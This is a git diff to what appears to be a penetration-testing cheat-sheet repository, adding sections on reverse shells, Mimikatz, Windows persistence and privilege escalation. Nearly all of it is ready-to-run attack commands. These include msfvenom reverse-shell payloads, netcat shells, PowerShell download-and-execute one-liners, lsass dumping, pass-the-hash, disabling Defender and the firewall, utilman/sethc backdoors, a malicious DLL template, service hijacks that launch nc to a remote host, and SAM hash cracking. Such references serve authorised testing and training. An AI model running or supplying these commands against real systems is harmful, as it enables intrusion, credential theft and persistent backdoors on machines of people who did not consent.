+msfvenom -p linux/x86/shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f elf >reverse.elf
+```
+
+### Other platforms
+
+```powershell
+$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f elf > shell.elf
+$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f exe > shell.exe
+$ msfvenom -p osx/x86/shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f macho > shell.macho
+$ msfvenom -p windows/meterpreter/reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f asp > shell.asp
+$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.jsp
+$ msfvenom -p java/jsp_shell_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f war > shell.war
+$ msfvenom -p cmd/unix/reverse_python LHOST="10.0.0.1" LPORT=4242 -f raw > shell.py
+$ msfvenom -p cmd/unix/reverse_bash LHOST="10.0.0.1" LPORT=4242 -f raw > shell.sh
+$ msfvenom -p cmd/unix/reverse_perl LHOST="10.0.0.1" LPORT=4242 -f raw > shell.pl
+$ msfvenom -p php/meterpreter_reverse_tcp LHOST="10.0.0.1" LPORT=4242 -f raw > shell.php; cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
+```
+
 ## Spawn TTY Shell
 
-Access shortcuts, su, nano and autocomplete in a partially tty shell
+In order to catch a shell, you need to listen on the desired port. `rlwrap` will enhance the shell, allowing you to clear the screen with `[CTRL] + [L]`.
 
-/!\ OhMyZSH might break this trick, a simple `sh` is recommended
+```powershell
+rlwrap nc 10.0.0.1 4242
+
+rlwrap -r -f . nc 10.0.0.1 4242
+-f . will make rlwrap use the current history file as a completion word list.
+-r Put all words seen on in- and output on the completion list.
+```
+
+Sometimes, you want to access shortcuts, su, nano and autocomplete in a partially tty shell.
+
+:warning: OhMyZSH might break this trick, a simple `sh` is recommended
 
 > The main problem here is that zsh doesn't handle the stty command the same way bash or sh does. [...] stty raw -echo; fg[...] If you try to execute this as two separated commands, as soon as the prompt appear for you to execute the fg command, your -echo command already lost its effect
 
@@ -266,13 +416,53 @@ Spawn a TTY shell from an interpreter
 
 ```powershell
 /bin/sh -i
-python -c 'import pty; pty.spawn("/bin/sh")'
+python3 -c 'import pty; pty.spawn("/bin/sh")'
+python3 -c "__import__('pty').spawn('/bin/bash')"
+python3 -c "__import__('subprocess').call(['/bin/bash'])"
 perl -e 'exec "/bin/sh";'
 perl: exec "/bin/sh";
+perl -e 'print `/bin/bash`'
 ruby: exec "/bin/sh"
 lua: os.execute('/bin/sh')
 ```
 
+- vi: `:!bash`
+- vi: `:set shell=/bin/bash:shell`
+- nmap: `!sh`
+- mysql: `! bash`
+
+Alternative TTY method
+
+```
+www-data@debian:/dev/shm$ su - user
+su: must be run from a terminal
+
+www-data@debian:/dev/shm$ /usr/bin/script -qc /bin/bash /dev/null
+www-data@debian:/dev/shm$ su - user
+Password: P4ssW0rD
+
+user@debian:~$ 
+```
+
+## Fully interactive reverse shell on Windows
+The introduction of the Pseudo Console (ConPty) in Windows has improved so much the way Windows handles terminals.
+
+**ConPtyShell uses the function [CreatePseudoConsole()](https://docs.microsoft.com/en-us/windows/console/createpseudoconsole). This function is available since Windows 10 / Windows Server 2019 version 1809 (build 10.0.17763).**
+
+
+Server Side:
+
+```
+stty raw -echo; (stty size; cat) | nc -lvnp 3001
+```
+
+Client Side:
+
+```
+IEX(IWR https://raw.githubusercontent.com/antonioCoco/ConPtyShell/master/Invoke-ConPtyShell.ps1 -UseBasicParsing); Invoke-ConPtyShell 10.0.0.2 3001
+```
+
+Offline version of the ps1 available at --> https://github.com/antonioCoco/ConPtyShell/blob/master/Invoke-ConPtyShell.ps1
 
 ## References
 
diff --git a/Methodology and Resources/Subdomains Enumeration.md b/Methodology and Resources/Subdomains Enumeration.md
index 0806a99a..88ee0e20 100644
--- a/Methodology and Resources/Subdomains Enumeration.md	
+++ b/Methodology and Resources/Subdomains Enumeration.md	
@@ -9,6 +9,7 @@
   * EyeWitness
   * Sublist3r
   * Subfinder
+  * Findomain
   * Aquatone (Ruby and Go versions)
   * AltDNS
   * MassDNS
@@ -86,6 +87,17 @@ go get github.com/subfinder/subfinder
 ./Subfinder/subfinder -d example.com -o /tmp/results_subfinder.txt
 ```
 
+### Using Findomain
+
+```powershell
+$ wget https://github.com/Edu4rdSHL/findomain/releases/latest/download/findomain-linux
+$ chmod +x findomain-linux
+$ findomain_spyse_token="YourAccessToken"
+$ findomain_virustotal_token="YourAccessToken" 
+$ findomain_fb_token="YourAccessToken" 
+$ ./findomain-linux -t example.com -o
+```
+
 ### Using Aquatone - old version (Ruby)
 
 ```powershell
diff --git a/Methodology and Resources/Windows - Mimikatz.md b/Methodology and Resources/Windows - Mimikatz.md
index 9e1f8696..ff349880 100644
--- a/Methodology and Resources/Windows - Mimikatz.md	
+++ b/Methodology and Resources/Windows - Mimikatz.md	
@@ -1,5 +1,18 @@
 # Windows - Mimikatz
 
+## Summary
+
+* [Mimikatz - Execute commands](#)
+* [Mimikatz - Extract passwords](#)
+* [Mimikatz - Mini Dump](#)
+* [Mimikatz - Golden ticket](#)
+* [Mimikatz - Skeleton key](#)
+* [Mimikatz - RDP session takeover](#)
+* [Mimikatz - Credential Manager & DPAPI](#)
+* [Mimikatz - Commands list](#)
+* [Mimikatz - Powershell version](#)
+* [References](#references)
+
 ![Data in memory](http://adsecurity.org/wp-content/uploads/2014/11/Delpy-CredentialDataChart.png)
 
 ## Mimikatz - Execute commands
@@ -21,18 +34,40 @@ mimikatz # sekurlsa::wdigest
 
 ## Mimikatz - Extract passwords
 
+> Microsoft disabled lsass clear text storage since Win8.1 / 2012R2+. It was backported (KB2871997) as a reg key on Win7 / 8 / 2008R2 / 2012 but clear text is still enabled.
+
 ```powershell
 mimikatz_command -f sekurlsa::logonPasswords full
 mimikatz_command -f sekurlsa::wdigest
+
+# to re-enable wdigest in Windows Server 2012+
+# in HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest 
+# create a DWORD 'UseLogonCredential' with the value 1.
+reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /f /d 1
 ```
 
+:warning: To take effect, conditions are required :
+- Win7 / 2008R2 / 8 / 2012 / 8.1 / 2012R2:
+  * Adding requires lock
+  * Removing requires signout
+- Win10:
+  * Adding requires signout
+  * Removing requires signout
+- Win2016:
+  * Adding requires lock
+  * Removing requires reboot
+
+
 ## Mimikatz - Mini Dump
 
 Dump the lsass process.
 
 ```powershell
-C:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
+# HTTP method
+certutil -urlcache -split -f http://live.sysinternals.com/procdump.exe C:\Users\Public\procdump.exe
+C:\Users\Public\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 
+# SMB method
 net use Z: https://live.sysinternals.com
 Z:\procdump.exe -accepteula -ma lsass.exe lsass.dmp
 ```
@@ -45,7 +80,13 @@ Switch to minidump
 mimikatz # sekurlsa::logonPasswords
 ```
 
-## Mimikatz Golden ticket
+## Mimikatz - Pass The Hash
+
+```powershell
+mimikatz # sekurlsa::pth /user:SCCM$ /domain:IDENTITY /ntlm:e722dfcd077a2b0bbe154a1b42872f4e /run:powershell
+```
+
+## Mimikatz - Golden ticket
 
 ```powershell
 .\mimikatz kerberos::golden /admin:ADMINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt
@@ -55,7 +96,7 @@ mimikatz # sekurlsa::logonPasswords
 .\mimikatz "kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt" exit
 ```
 
-## Mimikatz Skeleton key
+## Mimikatz - Skeleton key
 
 ```powershell
 privilege::debug
@@ -66,7 +107,41 @@ net use p: \\WIN-PTELU2U07KG\admin$ /user:john mimikatz
 rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
 ```
 
-## Mimikatz commands
+## Mimikatz - RDP session takeover
+
+Run tscon.exe as the SYSTEM user, you can connect to any session without a password.
+
+```powershell
+privilege::debug 
+token::elevate 
+ts::remote /id:2 
+```
+
+```powershell
+# get the Session ID you want to hijack
+query user
+create sesshijack binpath= "cmd.exe /k tscon 1 /dest:rdp-tcp#55"
+net start sesshijack
+```
+
+
+## Mimikatz - Credential Manager & DPAPI
+
+```powershell
+# check the folder to find credentials
+dir C:\Users\<username>\AppData\Local\Microsoft\Credentials\*
+
+# check the file with mimikatz
+$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0
+
+# find master key
+$ mimikatz !sekurlsa::dpapi
+
+# use master key
+$ mimikatz dpapi::cred /in:C:\Users\<username>\AppData\Local\Microsoft\Credentials\2647629F5AA74CD934ECD2F88D64ECD0 /masterkey:95664450d90eb2ce9a8b1933f823b90510b61374180ed5063043273940f50e728fe7871169c87a0bba5e0c470d91d21016311727bce2eff9c97445d444b6a17b
+```
+
+## Mimikatz - Commands list
 
 | Command |Definition|
 |:----------------:|:---------------|
@@ -93,7 +168,7 @@ rdesktop 10.0.0.2:3389 -u test -p mimikatz -d pentestlab
 |TOKEN::Elevate | impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box|
 |TOKEN::Elevate /domainadmin | impersonate a token with Domain Admin credentials.
 
-## Powershell Mimikatz
+## Mimikatz - Powershell version
 
 Mimikatz in memory (no binary on disk) with :
 
@@ -108,3 +183,4 @@ More informations can be grabbed from the Memory with :
 
 - [Unofficial Guide to Mimikatz & Command Reference](https://adsecurity.org/?page_id=1821)
 - [Skeleton Key](https://pentestlab.blog/2018/04/10/skeleton-key/)
+- [Reversing Wdigest configuration in Windows Server 2012 R2 and Windows Server 2016 - 5TH DECEMBER 2017 - ACOUCH](https://www.adamcouch.co.uk/reversing-wdigest-configuration-in-windows-server-2012-r2-and-windows-server-2016/)
diff --git a/Methodology and Resources/Windows - Persistence.md b/Methodology and Resources/Windows - Persistence.md
index 4873b3db..5f0b5ac3 100644
--- a/Methodology and Resources/Windows - Persistence.md	
+++ b/Methodology and Resources/Windows - Persistence.md	
@@ -1,7 +1,55 @@
 # Windows - Persistence
 
+## Summary
+
+* [Tools](#tools)
+* [Disable Windows Defender](#disable-windows-defender)
+* [Disable Windows Firewall](#disable-windows-firewall)
+* [Userland](#userland)
+    * [Registry](#registry)
+    * [Startup](#startup)
+    * [Scheduled Task](#scheduled-task)
+* [Serviceland](#serviceland)
+    * [IIS](#iis)
+    * [Windows Service](#windows-service)
+* [Elevated](#elevated)
+    * [HKLM](#hklm)
+    * [Services](#services)
+    * [Scheduled Task](#scheduled-task)
+    * [RDP Backdoor](#rdp-backdoor)
+* [References](#references)
+
+
+## Tools
+
+- [SharPersist - Windows persistence toolkit written in C#. - @h4wkst3r](https://github.com/fireeye/SharPersist)
+
+## Disable Windows Defender
+
+```powershell
+sc config WinDefend start= disabled
+sc stop WinDefend
+Set-MpPreference -DisableRealtimeMonitoring $true
+```
+
+## Disable Windows Firewall
+
+```powershell
+Netsh Advfirewall show allprofiles
+NetSh Advfirewall set allprofiles state off
+
+# ip whitelisting
+New-NetFirewallRule -Name morph3inbound -DisplayName morph3inbound -Enabled True -Direction Inbound -Protocol ANY -Action Allow -Profile ANY -RemoteAddress ATTACKER_IP
+```
+
 ## Userland
 
+Set a file as hidden
+
+```powershell
+attrib +h c:\autoexec.bat
+```
+
 ### Registry
 
 Create a REG_SZ value in the Run key within HKCU\Software\Microsoft\Windows.
@@ -11,6 +59,14 @@ Value name:  Backdoor
 Value data:  C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
 ```
 
+Using SharPersist
+
+```powershell
+SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add
+SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add -o env
+SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "logonscript" -m add
+```
+
 ### Startup
 
 Create a batch script in the user startup folder.
@@ -20,6 +76,12 @@ PS C:\> gc C:\Users\Rasta\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
 start /b C:\Users\Rasta\AppData\Local\Temp\backdoor.exe
 ```
 
+Using SharPersist
+
+```powershell
+SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add
+```
+
 ### Scheduled Task
 
 ```powershell
@@ -31,6 +93,37 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
 
+Using SharPersist
+
+```powershell
+# Add to a current scheduled task
+SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add
+
+# Add new task
+SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add
+SharPersist -t schtask -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Task" -m add -o hourly
+```
+
+## Serviceland
+
+### IIS
+
+IIS Raid – Backdooring IIS Using Native Modules
+
+```powershell
+$ git clone https://github.com/0x09AL/IIS-Raid
+$ python iis_controller.py --url http://192.168.1.11/ --password SIMPLEPASS
+C:\Windows\system32\inetsrv\APPCMD.EXE install module /name:Module Name /image:"%windir%\System32\inetsrv\IIS-Backdoor.dll" /add:true
+```
+
+### Windows Service
+
+Using SharPersist
+
+```powershell
+SharPersist -t service -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Some Service" -m add
+```
+
 ## Elevated
 
 ### HKLM
@@ -63,7 +156,28 @@ PS C:\> $D = New-ScheduledTask -Action $A -Trigger $T -Principal $P -Settings $S
 PS C:\> Register-ScheduledTask Backdoor -InputObject $D
 ```
 
+### RDP Backdoor
+
+#### utilman.exe
+
+At the login screen, press Windows Key+U, and you get a cmd.exe window as SYSTEM.
+
+```powershell
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\utilman.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
+```
+
+#### sethc.exe
+ 
+Hit F5 a bunch of times when you are at the RDP login screen.
+
+```powershell
+REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe" /t REG_SZ /v Debugger /d "C:\windows\system32\cmd.exe" /f
+```
+
+
 ## References
 
 * [A view of persistence - Rastamouse](https://rastamouse.me/2018/03/a-view-of-persistence/)
-* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
\ No newline at end of file
+* [Windows Persistence Commands - Pwn Wiki](http://pwnwiki.io/#!persistence/windows/index.md)
+* [SharPersist Windows Persistence Toolkit in C - Brett Hawkins](http://www.youtube.com/watch?v=K7o9RSVyazo)
+* [](https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/)
\ No newline at end of file
diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md
index 3975ad90..d4b05d60 100644
--- a/Methodology and Resources/Windows - Privilege Escalation.md	
+++ b/Methodology and Resources/Windows - Privilege Escalation.md	
@@ -6,24 +6,52 @@
 * [Windows Version and Configuration](#windows-version-and-configuration)
 * [User Enumeration](#user-enumeration)
 * [Network Enumeration](#network-enumeration)
+* [AppLocker Enumeration](#applocker-enumeration)
 * [EoP - Looting for passwords](#eop---looting-for-passwords)
+    * [SAM and SYSTEM files](#sam-and-system-files)
+    * [Search for file contents](#search-for-file-contents)
+    * [Search for a file with a certain filename](#search-for-a-file-with-a-certain-filename)
+    * [Search the registry for key names and passwords](#search-the-registry-for-key-names-and-passwords)
+    * [Passwords in unattend.xml](#passwords-in-unattendxml)
+    * [Wifi passwords](#wifi-passwords)
+    * [Passwords stored in services](#passwords-stored-in-services)
+    * [Powershell history](#powershell-history)
 * [EoP - Processes Enumeration and Tasks](#eop---processes-enumeration-and-tasks)
 * [EoP - Incorrect permissions in services](#eop---incorrect-permissions-in-services)
 * [EoP - Windows Subsystem for Linux (WSL)](#eop---windows-subsystem-for-linux-wsl)
 * [EoP - Unquoted Service Paths](#eop---unquoted-service-paths)
+* [EoP - Named Pipes](#eop---named-pipes)
 * [EoP - Kernel Exploitation](#eop---kernel-exploitation)
 * [EoP - AlwaysInstallElevated](#eop---alwaysinstallelevated)
 * [EoP - Insecure GUI apps](#eop---insecure-gui-apps)
 * [EoP - Runas](#eop---runas)
-* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposures)
-  * [Token Impersonation (RottenPotato)](#token-impersonation-rottenpotato)
+* [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system)
+* [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts)
+* [EoP - Impersonation Privileges](#eop---impersonation-privileges)
+  * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives)
+  * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation)
+  * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges)
+* [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure)
+  * [MS08-067 (NetAPI)](#ms08-067-netapi)
+  * [MS10-015 (KiTrap0D)](#ms10-015-kitrap0d---microsoft-windows-nt2000--2003--2008--xp--vista--7)
+  * [MS11-080 (adf.sys)](#ms11-080-afd.sys---microsoft-windows-xp-2003)
+  * [MS15-051 (Client Copy Image)](#ms15-051---microsoft-windows-2003--2008--7--8--2012)
   * [MS16-032](#ms16-032---microsoft-windows-7--10--2008--2012-r2-x86x64)
   * [MS17-010 (Eternal Blue)](#ms17-010-eternal-blue)
+  * [CVE-2019-1388](#cve-2019-1388)
+* [References](#references)
 
 ## Tools
 
+- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
+    ```powershell
+    powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
+    ```
 - [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
 - [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
+    ```powershell
+    powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -File Sherlock.ps1
+    ```
 - [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
 - [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
     ```powershell
@@ -32,11 +60,12 @@
     ```
 - [windows-privesc-check - Standalone Executable to Check for Simple Privilege Escalation Vectors on Windows Systems](https://github.com/pentestmonkey/windows-privesc-check)
 - [WindowsExploits - Windows exploits, mostly precompiled. Not being updated.](https://github.com/abatchy17/WindowsExploits)
-- [WindowsEnumv - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
+- [WindowsEnum - A Powershell Privilege Escalation Enumeration Script.](https://github.com/absolomb/WindowsEnum)
+- [Seatbelt - A C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives.](https://github.com/GhostPack/Seatbelt)
 - [Powerless - Windows privilege escalation (enumeration) script designed with OSCP labs (legacy Windows) in mind](https://github.com/M4ximuss/Powerless)
-- [PowerSploit's PowerUp](https://github.com/PowerShellMafia/PowerSploit)
+- [JAWS - Just Another Windows (Enum) Script](https://github.com/411Hall/JAWS)
     ```powershell
-    powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
+    powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
     ```
 
 ## Windows Version and Configuration
@@ -84,13 +113,13 @@ List user privilege
 
 ```powershell
 whoami /priv
+whoami /groups
 ```
 
 List all users
 
 ```powershell
 net user
-net user Swissky
 whoami /all
 Get-LocalUser | ft Name,Enabled,LastLogon
 Get-ChildItem C:\Users -Force | select Name
@@ -172,6 +201,13 @@ List firewall's blocked ports
 $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules |  where {$_.action -eq "0"} | select name,applicationname,localports
 ```
 
+Disable firewall
+
+```powershell
+netsh firewall set opmode disable
+netsh advfirewall set allprofiles state off
+```
+
 List all network shares
 
 ```powershell
@@ -185,11 +221,19 @@ reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
 Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 ```
 
+## AppLocker Enumeration
+
+- With the GPO
+- HKLM\SOFTWARE\Policies\Microsoft\Windows\SrpV2 (Keys: Appx, Dll, Exe, Msi and Script).
+
 ## EoP - Looting for passwords
 
 ### SAM and SYSTEM files
 
+The Security Account Manager (SAM), often Security Accounts Manager, is a database file. The user passwords are stored in a hashed format in a registry hive either as a LM hash or as a NTLM hash. This file can be found in %SystemRoot%/system32/config/SAM and is mounted on HKLM/SAM.
+
 ```powershell
+# Usually %SYSTEMROOT% = C:\Windows
 %SYSTEMROOT%\repair\SAM
 %SYSTEMROOT%\System32\config\RegBack\SAM
 %SYSTEMROOT%\System32\config\SAM
@@ -198,6 +242,15 @@ Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 %SYSTEMROOT%\System32\config\RegBack\system
 ```
 
+Generate a hash file for John using `pwdump` or `samdump2`.
+
+```powershell
+pwdump SYSTEM SAM > /root/sam.txt
+samdump2 SYSTEM SAM -o sam.txt
+```
+
+Then crack it with `john -format=NT /root/sam.txt`.
+
 ### Search for file contents
 
 ```powershell
@@ -239,7 +292,7 @@ REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 
 ### Passwords in unattend.xml
 
-Location of the unattend.xml files
+Location of the unattend.xml files.
 
 ```powershell
 C:\unattend.xml
@@ -249,12 +302,14 @@ C:\Windows\system32\sysprep.inf
 C:\Windows\system32\sysprep\sysprep.xml
 ```
 
+Display the content of these files with `dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul`.
+
 Example content
 
 ```powershell
 <component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
     <AutoLogon>
-     <Password>*SENSITIVE*DATA*DELETED*</Password>
+     <Password>U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo==</Password>
      <Enabled>true</Enabled>
      <Username>Administrateur</Username>
     </AutoLogon>
@@ -270,6 +325,13 @@ Example content
     </UserAccounts>
 ```
 
+Unattend credentials are stored in base64 and can be decoded manually with base64.
+
+```powershell
+$ echo "U2VjcmV0U2VjdXJlUGFzc3dvcmQxMjM0Kgo="  | base64 -d 
+SecretSecurePassword1234*
+```
+
 The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
 
 ### IIS Web config
@@ -336,6 +398,14 @@ Invoke-SessionGopher -AllDomain -o
 Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss
 ```
 
+### Powershell history
+
+```powershell
+type C:\Users\swissky\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
+type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
+cat (Get-PSReadlineOption).HistorySavePath
+cat (Get-PSReadlineOption).HistorySavePath | sls passw
+```
 
 ## EoP - Processes Enumeration and Tasks
 
@@ -380,6 +450,7 @@ Scheduled tasks
 
 ```powershell
 schtasks /query /fo LIST 2>nul | findstr TaskName
+schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM
 Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
 ```
 
@@ -401,6 +472,26 @@ dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
 Often, services are pointing to writeable locations:
 - Orphaned installs, not installed anymore but still exist in startup
 - DLL Hijacking
+    ```powershell
+    # find missing DLL 
+    - Find-PathDLLHijack PowerUp.ps1
+    - Process Monitor : check for "Name Not Found"
+
+    # compile a malicious dll
+    - For x64 compile with: "x86_64-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
+    - For x86 compile with: "i686-w64-mingw32-gcc windows_dll.c -shared -o output.dll"
+
+    # content of windows_dll.c
+    #include <windows.h>
+    BOOL WINAPI DllMain (HANDLE hDll, DWORD dwReason, LPVOID lpReserved) {
+        if (dwReason == DLL_PROCESS_ATTACH) {
+            system("cmd.exe /k whoami > C:\\Windows\\Temp\\dll.txt");
+            ExitProcess(0);
+        }
+        return TRUE;
+    }
+    ```
+
 - PATH directories with weak permissions
 
 ```powershell
@@ -422,7 +513,33 @@ Note to check file permissions you can use `cacls` and `icacls`
 
 You are looking for `BUILTIN\Users:(F)`(Full access), `BUILTIN\Users:(M)`(Modify access) or  `BUILTIN\Users:(W)`(Write-only access) in the output.
 
-### Example with Windows XP SP1
+### Example with Windows 10 - CVE-2019-1322 UsoSvc
+
+Prerequisite: Service account
+
+```powershell
+PS C:\Windows\system32> sc.exe stop UsoSvc
+PS C:\Windows\system32> sc.exe config usosvc binPath="C:\Windows\System32\spool\drivers\color\nc.exe 10.10.10.10 4444 -e cmd.exe"
+PS C:\Windows\system32> sc.exe config UsoSvc binpath= "C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe"
+PS C:\Windows\system32> sc.exe config UsoSvc binpath= "cmd \c C:\Users\nc.exe 10.10.10.10 4444 -e cmd.exe"
+PS C:\Windows\system32> sc.exe qc usosvc
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: usosvc
+        TYPE               : 20  WIN32_SHARE_PROCESS 
+        START_TYPE         : 2   AUTO_START  (DELAYED)
+        ERROR_CONTROL      : 1   NORMAL
+        BINARY_PATH_NAME   : C:\Users\mssql-svc\Desktop\nc.exe 10.10.10.10 4444 -e cmd.exe
+        LOAD_ORDER_GROUP   : 
+        TAG                : 0
+        DISPLAY_NAME       : Update Orchestrator Service
+        DEPENDENCIES       : rpcss
+        SERVICE_START_NAME : LocalSystem
+
+PS C:\Windows\system32> sc.exe start UsoSvc
+```
+
+### Example with Windows XP SP1 - upnphost
 
 ```powershell
 # NOTE: spaces are mandatory for this exploit to work !
@@ -444,7 +561,8 @@ net start upnphost
 sc config upnphost depend=""
 ```
 
-Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals.
+Using [`accesschk`](https://web.archive.org/web/20080530012252/http://live.sysinternals.com/accesschk.exe) from Sysinternals or [accesschk-XP.exe - github.com/phackt](https://github.com/phackt/pentest/blob/master/privesc/windows/accesschk-XP.exe)
+
 ```powershell
 $ accesschk.exe -uwcqv "Authenticated Users" * /accepteula
 RW SSDPSRV
@@ -496,6 +614,8 @@ The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windo
 ```powershell
 wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
 
+wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """
+
 gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
 ```
 
@@ -507,6 +627,13 @@ For `C:\Program Files\something\legit.exe`, Windows will try the following paths
 - `C:\Program.exe`
 - `C:\Program Files.exe`
 
+## EoP - Named Pipes
+
+1. Find named pipes: `[System.IO.Directory]::GetFiles("\\.\pipe\")`
+2. Check named pipes DACL: `pipesec.exe <named_pipe>`
+3. Reverse engineering software
+4. Send data throught the named pipe : `program.exe >\\.\pipe\StdOutPipe 2>\\.\pipe\StdErrPipe`
+
 
 ## EoP - Kernel Exploitation
 
@@ -542,7 +669,6 @@ Check if these registry values are set to "1".
 
 ```bat
 $ reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
-
 $ reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
 ```
 
@@ -586,16 +712,64 @@ C:\Windows\System32\runas.exe /env /noprofile /user:<username> <password> "c:\us
 ```
 
 ```powershell
-$ secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
-$ mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
-$ computer = "<hostname>"
+$secpasswd = ConvertTo-SecureString "<password>" -AsPlainText -Force
+$mycreds = New-Object System.Management.Automation.PSCredential ("<user>", $secpasswd)
+$computer = "<hostname>"
 [System.Diagnostics.Process]::Start("C:\users\public\nc.exe","<attacker_ip> 4444 -e cmd.exe", $mycreds.Username, $mycreds.Password, $computer)
 ```
 
+## EoP - From local administrator to NT SYSTEM
 
-## EoP - Common Vulnerabilities and Exposure
+```powershell
+PsExec.exe -i -s cmd.exe
+```
 
